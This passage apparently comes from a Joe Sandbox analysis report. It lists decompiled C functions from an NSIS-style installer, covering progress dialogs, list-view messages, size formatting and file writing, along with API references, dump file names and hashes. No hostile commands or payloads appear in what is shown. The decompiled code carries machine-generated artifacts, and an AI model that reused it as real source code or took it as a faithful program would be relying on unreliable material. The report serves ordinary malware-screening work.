							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x43e708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x8000) {
							_t27 = lstrcatW(0x43e708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                                                                                                  0x00405456
                                                                                                                                                                                                  0x00405460
                                                                                                                                                                                                  0x00405465
                                                                                                                                                                                                  0x0040546b
                                                                                                                                                                                                  0x00405476
                                                                                                                                                                                                  0x00405479
                                                                                                                                                                                                  0x0040547c
                                                                                                                                                                                                  0x00405482
                                                                                                                                                                                                  0x00405482
                                                                                                                                                                                                  0x00405488
                                                                                                                                                                                                  0x00405490
                                                                                                                                                                                                  0x00405493
                                                                                                                                                                                                  0x004054b0
                                                                                                                                                                                                  0x004054b4
                                                                                                                                                                                                  0x004054bd
                                                                                                                                                                                                  0x004054bd
                                                                                                                                                                                                  0x004054c7
                                                                                                                                                                                                  0x004054d0
                                                                                                                                                                                                  0x004054dc
                                                                                                                                                                                                  0x004054e3
                                                                                                                                                                                                  0x004054e7
                                                                                                                                                                                                  0x004054ea
                                                                                                                                                                                                  0x004054fd
                                                                                                                                                                                                  0x0040550b
                                                                                                                                                                                                  0x0040550b
                                                                                                                                                                                                  0x0040550f
                                                                                                                                                                                                  0x00405511
                                                                                                                                                                                                  0x00405514
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405514
                                                                                                                                                                                                  0x00405495
                                                                                                                                                                                                  0x0040549d
                                                                                                                                                                                                  0x004054a5
                                                                                                                                                                                                  0x004054ab
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004054ab
                                                                                                                                                                                                  0x004054a5
                                                                                                                                                                                                  0x00405493
                                                                                                                                                                                                  0x00405520

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                  • lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                  • lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                  • SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                                                                                  • Opcode ID: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                  • Instruction ID: b152cc9d973ae9b63f3bddadd0b016ecede68a0b65af60167b2766ac6abf260a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1721A171900518BADB119F96DD84ACFBFB5EF44314F10803AF904B22A1C7798A90CFA8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00402E8E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42a6dc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42a6dc = 0;
					return _t15;
				}
				__eflags =  *0x42a6dc; // 0x0
				if(__eflags != 0) {
					return E004067FE(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x470250;
				if(_t6 >  *0x470250) {
					__eflags =  *0x470248;
					if( *0x470248 == 0) {
						_t7 = CreateDialogParamW( *0x470240, 0x6f, 0, E00402DF3, 0);
						 *0x42a6dc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x470314 & 0x00000001;
					if(( *0x470314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402E72());
						return E00405450(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                                                                                                                                  0x00402e9d
                                                                                                                                                                                                  0x00402e9f
                                                                                                                                                                                                  0x00402ea6
                                                                                                                                                                                                  0x00402ea9
                                                                                                                                                                                                  0x00402ea9
                                                                                                                                                                                                  0x00402eaf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402eaf
                                                                                                                                                                                                  0x00402eb7
                                                                                                                                                                                                  0x00402ebd
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402ec0
                                                                                                                                                                                                  0x00402ec7
                                                                                                                                                                                                  0x00402ecd
                                                                                                                                                                                                  0x00402ed3
                                                                                                                                                                                                  0x00402ed5
                                                                                                                                                                                                  0x00402edb
                                                                                                                                                                                                  0x00402f19
                                                                                                                                                                                                  0x00402f22
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402f27
                                                                                                                                                                                                  0x00402edd
                                                                                                                                                                                                  0x00402ee4
                                                                                                                                                                                                  0x00402ef5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402f03
                                                                                                                                                                                                  0x00402ee4
                                                                                                                                                                                                  0x00402f2f

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                  • CreateDialogParamW.USER32 ref: 00402F19
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                                    • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,0002581B), ref: 00402E87
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                  • String ID: ... %d%%
                                                                                                                                                                                                  • API String ID: 722711167-2449383134
                                                                                                                                                                                                  • Opcode ID: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                  • Instruction ID: 498445d7746695eb5746344947d7fa5b32a20b045a0bc4bf054171d5bd846382
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C901C4B0801614EBC7226B60FE4CA9B7B68BB00745B14013BF885F11E1CBB84855EFDE
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00404D1A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                                                  0x00404d28
                                                                                                                                                                                                  0x00404d35
                                                                                                                                                                                                  0x00404d3b
                                                                                                                                                                                                  0x00404d79
                                                                                                                                                                                                  0x00404d79
                                                                                                                                                                                                  0x00404d88
                                                                                                                                                                                                  0x00404d8f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404d91
                                                                                                                                                                                                  0x00404d3d
                                                                                                                                                                                                  0x00404d4c
                                                                                                                                                                                                  0x00404d54
                                                                                                                                                                                                  0x00404d57
                                                                                                                                                                                                  0x00404d69
                                                                                                                                                                                                  0x00404d6f
                                                                                                                                                                                                  0x00404d76
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404d76
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                                  • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                                  • ScreenToClient.USER32 ref: 00404D57
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                  • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00402DF3(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E72();
					_t19 = L"unpacking data: %d%%";
					if( *0x470254 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                                                                                                  0x00402e03
                                                                                                                                                                                                  0x00402e11
                                                                                                                                                                                                  0x00402e17
                                                                                                                                                                                                  0x00402e17
                                                                                                                                                                                                  0x00402e25
                                                                                                                                                                                                  0x00402e27
                                                                                                                                                                                                  0x00402e33
                                                                                                                                                                                                  0x00402e38
                                                                                                                                                                                                  0x00402e3a
                                                                                                                                                                                                  0x00402e3a
                                                                                                                                                                                                  0x00402e45
                                                                                                                                                                                                  0x00402e55
                                                                                                                                                                                                  0x00402e67
                                                                                                                                                                                                  0x00402e67
                                                                                                                                                                                                  0x00402e6f

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                                                                                                  • Opcode ID: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                  • Instruction ID: e56410310a72084f4d909e549713b6ef5e7faa8c618e51606751afd800fe69ca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F0317064020CABDF206F60DD4EBEE3B69EB40319F00803AFA45B51D0DBF999598F99
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                                  			E004028AD(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C41(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405D34(_t50) == 0) {
					E00402C41(0xffffffed);
				}
				E00405EB9(_t50);
				_t26 = E00405EDE(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x470258;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040345D(_t45);
						E00403447(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							E004031D6(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405E99( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405F90( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E004031D6(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                                                                                                                                  0x004028ad
                                                                                                                                                                                                  0x004028af
                                                                                                                                                                                                  0x004028bb
                                                                                                                                                                                                  0x004028be
                                                                                                                                                                                                  0x004028c8
                                                                                                                                                                                                  0x004028cc
                                                                                                                                                                                                  0x004028cc
                                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                                  0x004028df
                                                                                                                                                                                                  0x004028e7
                                                                                                                                                                                                  0x004028ea
                                                                                                                                                                                                  0x004028f0
                                                                                                                                                                                                  0x004028fe
                                                                                                                                                                                                  0x00402903
                                                                                                                                                                                                  0x00402907
                                                                                                                                                                                                  0x0040290a
                                                                                                                                                                                                  0x00402913
                                                                                                                                                                                                  0x0040291f
                                                                                                                                                                                                  0x00402923
                                                                                                                                                                                                  0x00402926
                                                                                                                                                                                                  0x00402930
                                                                                                                                                                                                  0x0040294f
                                                                                                                                                                                                  0x00402937
                                                                                                                                                                                                  0x0040293c
                                                                                                                                                                                                  0x00402944
                                                                                                                                                                                                  0x00402947
                                                                                                                                                                                                  0x0040294c
                                                                                                                                                                                                  0x0040294c
                                                                                                                                                                                                  0x00402956
                                                                                                                                                                                                  0x00402956
                                                                                                                                                                                                  0x00402963
                                                                                                                                                                                                  0x00402969
                                                                                                                                                                                                  0x0040297b
                                                                                                                                                                                                  0x0040297b
                                                                                                                                                                                                  0x00402981
                                                                                                                                                                                                  0x00402981
                                                                                                                                                                                                  0x0040298c
                                                                                                                                                                                                  0x0040298d
                                                                                                                                                                                                  0x00402991
                                                                                                                                                                                                  0x00402995
                                                                                                                                                                                                  0x0040299b
                                                                                                                                                                                                  0x0040299b
                                                                                                                                                                                                  0x004029a2
                                                                                                                                                                                                  0x0040224b
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 00402956
                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 00402969
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                                                                  • Opcode ID: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                  • Instruction ID: cde632e975db2237da1c3b35629bcc1af8e7f74e244a4afe6fc019873d9bc44b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D921BFB1C00124BBCF116FA5DE48D9E7E79EF09324F10023AF9647A2E1CB794D418B98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                                  			E00404C0C(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040640A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040640A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040640A(_t44, _t50, 0x446728, 0x446728, _a8);
				wsprintfW(_t34 + lstrlenW(0x446728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x468218, _a4, 0x446728);
			}



















                                                                                                                                                                                                  0x00404c15
                                                                                                                                                                                                  0x00404c1a
                                                                                                                                                                                                  0x00404c22
                                                                                                                                                                                                  0x00404c23
                                                                                                                                                                                                  0x00404c30
                                                                                                                                                                                                  0x00404c38
                                                                                                                                                                                                  0x00404c39
                                                                                                                                                                                                  0x00404c3b
                                                                                                                                                                                                  0x00404c3d
                                                                                                                                                                                                  0x00404c3f
                                                                                                                                                                                                  0x00404c42
                                                                                                                                                                                                  0x00404c42
                                                                                                                                                                                                  0x00404c49
                                                                                                                                                                                                  0x00404c4f
                                                                                                                                                                                                  0x00404c4f
                                                                                                                                                                                                  0x00404c56
                                                                                                                                                                                                  0x00404c5d
                                                                                                                                                                                                  0x00404c60
                                                                                                                                                                                                  0x00404c63
                                                                                                                                                                                                  0x00404c63
                                                                                                                                                                                                  0x00404c67
                                                                                                                                                                                                  0x00404c77
                                                                                                                                                                                                  0x00404c79
                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                  0x00404c25
                                                                                                                                                                                                  0x00404c25
                                                                                                                                                                                                  0x00404c2c
                                                                                                                                                                                                  0x00404c2c
                                                                                                                                                                                                  0x00404c84
                                                                                                                                                                                                  0x00404c8f
                                                                                                                                                                                                  0x00404ca5
                                                                                                                                                                                                  0x00404cb6
                                                                                                                                                                                                  0x00404cd2

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                  • SetDlgItemTextW.USER32 ref: 00404CC9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
